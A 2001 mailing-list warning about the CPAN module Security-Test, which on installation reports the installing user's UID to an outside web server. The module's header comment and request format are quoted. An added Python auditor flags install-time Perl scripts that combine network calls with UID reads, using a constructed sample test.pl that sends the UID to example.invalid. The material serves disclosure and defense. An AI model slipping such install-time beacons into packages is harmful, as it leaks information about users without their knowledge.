I just caught this going by in the daily CPAN update.
[9.] Security-Test - Performs checks for common Perl insecurities
Uploaded: Sep 06, 2001
CPAN id: N/NW/NWETTERS (Nigel Wetters)
http://search.cpan.org/search?author=NWETTERS
Package: Security-Test-0.01.tar.gz
http://search.cpan.org/search?dist=Security-Test-0.01

What this module actually does is contact a web server upon
installation and tell it what the UID that ran the test was (to see
if it's root).

It does *not* look like there is any malicious intent, just a little
overzealous. I've contacted the author and asked him to voluntarily
delete this module and discuss the problem with [EMAIL PROTECTED]

package Security::Test;
# IMPORTANT IMPORTANT IMPORTANT IMPORTANT IMPORTANT
#
# READ THIS BEFORE INSTALLING!!
#
# This module does nothing.
#
# The test module sends a HTTP request to
# http://securitytest.perlfascist.com
# which notes the number of attempted installations
# and whether installation was performed
# with superuser priviledges. The request is
# formatted as follows:
# GET /YetAnotherFail?uid=$uid HTTP/1.1
# Host: securitytest.perlfascist.com
# I will release details of this research
# to CPAN maintainers, and maybe later will
# post a summary on
# http://securitytest.perlfascist.com
--
Michael G. Schwern <[EMAIL PROTECTED]> http://www.pobox.com/~schwern/
Perl6 Quality Assurance <[EMAIL PROTECTED]> Kwalitee Is Job One
The eye opening delightful morning taste of expired cheese bits in sour milk!
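
An added example, not part of the original message and not code from the module: a pre-install check for an unpacked distribution that flags install-time scripts which both touch the network and read the UID, the behaviour described above. The regex patterns are heuristic assumptions, and the sample distribution (names, host, contents) is constructed.

```python
import re

# Files that run automatically during "perl Makefile.PL; make test; make install".
INSTALL_TIME = re.compile(r"(^|/)(Makefile\.PL|Build\.PL|test\.pl)$|(^|/)t/[^/]+\.t$")

# Heuristic (assumed, not exhaustive) signs of network use in Perl source.
NETWORK = re.compile(
    r"\b(LWP::\w+|HTTP::\w+|IO::Socket(::\w+)?|Net::\w+)\b|\bsocket\s*\(|https?://"
)
# Perl's real/effective UID variables ($<, $>, their English.pm names) and getpwuid.
UID = re.compile(
    r"\$[<>](?!\w)|\$(?:REAL_USER_ID|EFFECTIVE_USER_ID|E?UID)\b|\bgetpwuid\b"
)

def audit(files):
    """files maps path -> source text; returns {path: sorted list of findings}."""
    report = {}
    for path, text in files.items():
        if not INSTALL_TIME.search(path):
            continue  # only code that executes during build/test/install
        # Ignore full-line comments so a documented URL alone does not trigger.
        code = "\n".join(
            line for line in text.splitlines() if not line.lstrip().startswith("#")
        )
        found = set()
        if NETWORK.search(code):
            found.add("network")
        if UID.search(code):
            found.add("uid")
        if found:
            report[path] = sorted(found)
    return report

# Constructed sample distribution (not the real Security-Test contents).
SAMPLE = {
    "Example-Dist-0.01/lib/Example/Dist.pm": "package Example::Dist;\n1;\n",
    "Example-Dist-0.01/t/basic.t": "use Test::More tests => 1;\nok(1);\n",
    "Example-Dist-0.01/test.pl": (
        "use IO::Socket::INET;\n"
        "my $uid = $<;\n"
        'my $s = IO::Socket::INET->new(PeerAddr => "example.invalid:80");\n'
        'print $s "GET /?uid=$uid HTTP/1.1\\r\\nHost: example.invalid\\r\\n\\r\\n";\n'
    ),
}

if __name__ == "__main__":
    for path, findings in audit(SAMPLE).items():
        print(path, "->", ", ".join(findings))
```

A file flagged with both `network` and `uid` is worth reading by hand before running the install as any user, and especially before running it as root.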